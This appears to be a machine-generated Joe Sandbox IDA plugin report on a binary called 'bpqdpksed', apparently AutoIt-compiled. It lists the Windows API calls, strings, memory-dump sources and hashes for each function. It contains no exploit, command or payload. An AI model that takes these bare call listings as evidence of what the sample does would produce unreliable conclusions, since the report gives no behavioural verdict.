                                                                                              • Instruction Fuzzy Hash: 6351AE70A50306ABDF20DF68CA84FAEBBF5AF44314F28611DE609972A1E770D941CB31
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                              • String ID: 0.0.0.0
                                                                                              • API String ID: 642191829-3771769585
                                                                                              • Opcode ID: 7ac1b2150a6cb8f16cfb4c00b305a7e6b2b81c37f090b2ecbbc96226deaf4b18
                                                                                              • Instruction ID: e4406a6555120d4845be9c3b201cf558efdfb88357ec7e9e233d917ba2fc8857
                                                                                              • Opcode Fuzzy Hash: 7ac1b2150a6cb8f16cfb4c00b305a7e6b2b81c37f090b2ecbbc96226deaf4b18
                                                                                              • Instruction Fuzzy Hash: CE11DF72900216ABDB247B209C4AFEA77BDDF00710F1500A9F545E7191EB70CA81DBB0
                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(?), ref: 00DE42C8
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00DE43D7
                                                                                              • _wcslen.LIBCMT ref: 00DE43E7
                                                                                              • VariantClear.OLEAUT32(?), ref: 00DE457C
                                                                                                • Part of subcall function 00DD15B3: VariantInit.OLEAUT32(00000000), ref: 00DD15F3
                                                                                                • Part of subcall function 00DD15B3: VariantCopy.OLEAUT32(?,?), ref: 00DD15FC
                                                                                                • Part of subcall function 00DD15B3: VariantClear.OLEAUT32(?), ref: 00DD1608
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                              • API String ID: 4137639002-1221869570
                                                                                              • Opcode ID: 6131af0ac07700c63468d08a93c021769440b3b1013a5c07b9ffbad345011370
                                                                                              • Instruction ID: 2639aace12a6b682e5ed046e1ae2bd6cd6ed9abcff91ec1512c856b32cee5115
                                                                                              • Opcode Fuzzy Hash: 6131af0ac07700c63468d08a93c021769440b3b1013a5c07b9ffbad345011370
                                                                                              • Instruction Fuzzy Hash: C8916A75A083419FC700EF69C48196AB7E5FF88314F14892DF89A9B351DB31ED46CBA2
                                                                                              APIs
                                                                                              • GetMenu.USER32(?), ref: 00DF2AE2
                                                                                              • GetMenuItemCount.USER32(00000000), ref: 00DF2B14
                                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00DF2B3C
                                                                                              • _wcslen.LIBCMT ref: 00DF2B72
                                                                                              • GetMenuItemID.USER32(?,?), ref: 00DF2BAC
                                                                                              • GetSubMenu.USER32(?,?), ref: 00DF2BBA
                                                                                                • Part of subcall function 00DC42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DC42E6
                                                                                                • Part of subcall function 00DC42CC: GetCurrentThreadId.KERNEL32 ref: 00DC42ED
                                                                                                • Part of subcall function 00DC42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DC2E43), ref: 00DC42F4
                                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00DF2C42
                                                                                                • Part of subcall function 00DCF1A7: Sleep.KERNEL32 ref: 00DCF21F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 4196846111-0
                                                                                              • Opcode ID: 58b10e74f57d6858b3c3863b772e98aa317b73cf96cbb8248333e873af6b81eb
                                                                                              • Instruction ID: 359a6ec585482716c116312a8d2708631ce7038ac3a74d178e536442b3301a7d
                                                                                              • Opcode Fuzzy Hash: 58b10e74f57d6858b3c3863b772e98aa317b73cf96cbb8248333e873af6b81eb
                                                                                              • Instruction Fuzzy Hash: E4716D75A00209AFCB10EFA4C885ABEBBB5EF48310F158459E956EB351DB74ED41CBB0
                                                                                              APIs
                                                                                              • IsWindow.USER32(00000000), ref: 00DF8896
                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00DF88A2
                                                                                              • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00DF897D
                                                                                              • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00DF89B0
                                                                                              • IsDlgButtonChecked.USER32(?,00000000), ref: 00DF89E8
                                                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 00DF8A0A
                                                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00DF8A22
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                              • String ID:
                                                                                              • API String ID: 4072528602-0
                                                                                              • Opcode ID: cb15167fa8fe23a34cc04735143c898232d008bf9615e611f9d49209f13971d3
                                                                                              • Instruction ID: a524bb82f4cb4074efd89097d75c557f7d653f497aa1c937c7632625061635e3
                                                                                              • Opcode Fuzzy Hash: cb15167fa8fe23a34cc04735143c898232d008bf9615e611f9d49209f13971d3
                                                                                              • Instruction Fuzzy Hash: F271B03460420CAFEF219F50C894FBA7BB5EF49340F598459EA8597261CB71AE40EF32
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DC80D1
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DC80F7
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00DC80FA
                                                                                              • SysAllocString.OLEAUT32 ref: 00DC811B
                                                                                              • SysFreeString.OLEAUT32 ref: 00DC8124
                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00DC813E
                                                                                              • SysAllocString.OLEAUT32(?), ref: 00DC814C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                              • String ID:
                                                                                              • API String ID: 3761583154-0
                                                                                              • Opcode ID: f5500c09c1cf247aadccdc8ec2c964b52b790d4eead363a7735c20fbb8383212
                                                                                              • Instruction ID: 2251b51076f63c37f0a706274e1d65c10b40f0b509148534f7188b76b39f2af1
                                                                                              • Opcode Fuzzy Hash: f5500c09c1cf247aadccdc8ec2c964b52b790d4eead363a7735c20fbb8383212
                                                                                              • Instruction Fuzzy Hash: 88218671200305AFDB10AFA8DC88DBA77EDEB493607088129F905CB2A0DA70EC45E774
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00DD0DAE
                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DD0DEA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateHandlePipe
                                                                                              • String ID: nul
                                                                                              • API String ID: 1424370930-2873401336
                                                                                              • Opcode ID: c4a2da7eca29bf082f9b40542660e0a9a3300e027fe0968e1b7ba89203176801
                                                                                              • Instruction ID: 13cc19df83f681dd2d9902a59e1649bb698d55136e03d1ebaeea646c913e67eb
                                                                                              • Opcode Fuzzy Hash: c4a2da7eca29bf082f9b40542660e0a9a3300e027fe0968e1b7ba89203176801
                                                                                              • Instruction Fuzzy Hash: 96214B70500305AFDB208F69D808BAABFA5AF85720F244E1AF9A1E73E0D7709850CB70
                                                                                              APIs
                                                                                                • Part of subcall function 00D6771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D67759
                                                                                                • Part of subcall function 00D6771B: GetStockObject.GDI32(00000011), ref: 00D6776D
                                                                                                • Part of subcall function 00D6771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D67777
                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00DF4A71
                                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00DF4A7E
                                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00DF4A89
                                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00DF4A98
                                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00DF4AA4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                                              • String ID: Msctls_Progress32
                                                                                              • API String ID: 1025951953-3636473452
                                                                                              • Opcode ID: df081566bf9731ca5445b008ad6feaf24795adde2e3f9475a21e868b0f24c619
                                                                                              • Instruction ID: 011f98de3355291c71d4ed15f6024fda760e908cce1766ca3a832c0bd8833da0
                                                                                              • Opcode Fuzzy Hash: df081566bf9731ca5445b008ad6feaf24795adde2e3f9475a21e868b0f24c619
                                                                                              • Instruction Fuzzy Hash: 781182B215021DBEEF119F64CC85EE77F9DEF08758F018111BB58A6190CA729C21DBB4
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00DCE23D
                                                                                              • LoadStringW.USER32(00000000), ref: 00DCE244
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00DCE25A
                                                                                              • LoadStringW.USER32(00000000), ref: 00DCE261
                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00DCE2A5
                                                                                              Strings
                                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00DCE282
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleLoadModuleString$Message
                                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                                              • API String ID: 4072794657-3128320259
                                                                                              • Opcode ID: 6270a53d5dff110deac3d841ce13fc915a67d341186a343832c7e4f60ba1f328
                                                                                              • Instruction ID: 87c14c9462a050e3b873c7576dec0a7b23685397e348fd9db0f676e04b3a59d5
                                                                                              • Opcode Fuzzy Hash: 6270a53d5dff110deac3d841ce13fc915a67d341186a343832c7e4f60ba1f328
                                                                                              • Instruction Fuzzy Hash: 21011DF690030CBFE711A7A49D89FFA776DDB08300F018595B74AE2141EA749E858B75
                                                                                              APIs
                                                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00DE271D
                                                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00DE273E
                                                                                              • WSAGetLastError.WSOCK32 ref: 00DE274F
                                                                                              • htons.WSOCK32(?,?,?,?,?), ref: 00DE2838
                                                                                              • inet_ntoa.WSOCK32(?), ref: 00DE27E9
                                                                                                • Part of subcall function 00DC4277: _strlen.LIBCMT ref: 00DC4281
                                                                                                • Part of subcall function 00DE3B81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00DDF569), ref: 00DE3B9D
                                                                                              • _strlen.LIBCMT ref: 00DE2892
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                              • String ID:
                                                                                              • API String ID: 3203458085-0
                                                                                              • Opcode ID: ea48322ca7f6cc94e58ada9cd0caab13e76c7500a8248cc2726b7e8b6c1fde40
                                                                                              • Instruction ID: deb2c2fd965a7beac6867c0a248ebe39358fdecd12d48af6d5c2cf5e4aadb308
                                                                                              • Opcode Fuzzy Hash: ea48322ca7f6cc94e58ada9cd0caab13e76c7500a8248cc2726b7e8b6c1fde40
                                                                                              • Instruction Fuzzy Hash: 3EB1C175604340AFD314EF25C895E3A7BA9EF84318F58854CF49A8B2A2DB31ED45CBB1
                                                                                              APIs
                                                                                              • __allrem.LIBCMT ref: 00D9044A
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D90466
                                                                                              • __allrem.LIBCMT ref: 00D9047D
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D9049B
                                                                                              • __allrem.LIBCMT ref: 00D904B2
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D904D0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                              • String ID:
                                                                                              • API String ID: 1992179935-0
                                                                                              • Opcode ID: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
                                                                                              • Instruction ID: e225dcc0b29a2265b14b04af66b04ae6f9167535075b7ce436e36353e6fa65d1
                                                                                              • Opcode Fuzzy Hash: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
                                                                                              • Instruction Fuzzy Hash: 64810672600706AFDF20AE6DEC81B6A7BE8EF45724F24412EF651D7691E770D9008BB0
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D88669,00D88669,?,?,?,00D967DF,00000001,00000001,8BE85006), ref: 00D965E8
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D967DF,00000001,00000001,8BE85006,?,?,?), ref: 00D9666E
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D96768
                                                                                              • __freea.LIBCMT ref: 00D96775
                                                                                                • Part of subcall function 00D93BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D86A99,?,0000015D,?,?,?,?,00D885D0,000000FF,00000000,?,?), ref: 00D93BE2
                                                                                              • __freea.LIBCMT ref: 00D9677E
                                                                                              • __freea.LIBCMT ref: 00D967A3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1414292761-0
                                                                                              • Opcode ID: 3f374cf5a5aab0d5caccec41e65830366171d6c975c1c46cdf04dc65b9a905d5
                                                                                              • Instruction ID: e4945bde2690ec7f9656c841a9647d2828945d6f50d362c4839b4593b6f3b765
                                                                                              • Opcode Fuzzy Hash: 3f374cf5a5aab0d5caccec41e65830366171d6c975c1c46cdf04dc65b9a905d5
                                                                                              • Instruction Fuzzy Hash: 8651CF72600216ABEF259FA4CC81EBF77AAEB44B54B294669FC04D7150EB74DC40C7B0
                                                                                              APIs
                                                                                                • Part of subcall function 00D6B25F: _wcslen.LIBCMT ref: 00D6B269
                                                                                                • Part of subcall function 00DED2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DEC00D,?,?), ref: 00DED314
                                                                                                • Part of subcall function 00DED2F7: _wcslen.LIBCMT ref: 00DED350
                                                                                                • Part of subcall function 00DED2F7: _wcslen.LIBCMT ref: 00DED3C7
                                                                                                • Part of subcall function 00DED2F7: _wcslen.LIBCMT ref: 00DED3FD
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DEC629
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DEC684
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00DEC6C9
                                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00DEC6F8
                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00DEC752
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00DEC75E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                              • String ID:
                                                                                              • API String ID: 1120388591-0
                                                                                              • Opcode ID: d32a3241dfb46ffba8e24f4e8f80622a94aa2201b2b5a856529024ed0250fa75
                                                                                              • Instruction ID: 526f4b32d82eabf2250ee1693bdf3bc157ee616fd54c68259a9174b47a17b852
                                                                                              • Opcode Fuzzy Hash: d32a3241dfb46ffba8e24f4e8f80622a94aa2201b2b5a856529024ed0250fa75
                                                                                              • Instruction Fuzzy Hash: D4819071118381AFD714EF24C885E2ABBE5FF84308F18955CF4958B2A2DB31ED46CBA1
                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(00000035), ref: 00DC0049
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00DC00F0
                                                                                              • VariantCopy.OLEAUT32(00DC02F4,00000000), ref: 00DC0119
                                                                                              • VariantClear.OLEAUT32(00DC02F4), ref: 00DC013D
                                                                                              • VariantCopy.OLEAUT32(00DC02F4,00000000), ref: 00DC0141
                                                                                              • VariantClear.OLEAUT32(?), ref: 00DC014B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearCopy$AllocInitString
                                                                                              • String ID:
                                                                                              • API String ID: 3859894641-0
                                                                                              • Opcode ID: c4ef97ed5bd11c65215ddccfeb3ca303780258ce6f6e5fb1ed7060c9b945d1a2
                                                                                              • Instruction ID: 3fc499cfe2685f67424246a4bef7a4e7fcb8d7bd98b283f86efb9be4e262c951
                                                                                              • Opcode Fuzzy Hash: c4ef97ed5bd11c65215ddccfeb3ca303780258ce6f6e5fb1ed7060c9b945d1a2
                                                                                              • Instruction Fuzzy Hash: 2C51E635640312EBCF20AB649885F29BBA9EF05310B14944FE905DF296EA709C44CBB5
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00DD6E36
                                                                                              • CoInitialize.OLE32(00000000), ref: 00DD6F93
                                                                                              • CoCreateInstance.OLE32(00E00CC4,00000000,00000001,00E00B34,?), ref: 00DD6FAA
                                                                                              • CoUninitialize.OLE32 ref: 00DD722E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                              • String ID: .lnk
                                                                                              • API String ID: 886957087-24824748
                                                                                              • Opcode ID: d42854ab4aa704a4dc8a838e7bd1d2d0c2c404671d7468ad9576d8f1477be0f1
                                                                                              • Instruction ID: d81a4c8ef9843f886a02b0768636daba6fdd62faf806e32317600b4e5a680b20
                                                                                              • Opcode Fuzzy Hash: d42854ab4aa704a4dc8a838e7bd1d2d0c2c404671d7468ad9576d8f1477be0f1
                                                                                              • Instruction Fuzzy Hash: 8FD14771508341AFC304EF64C881E6BB7E8EF98718F04495EF5958B2A1EB71ED45CBA2
                                                                                              APIs
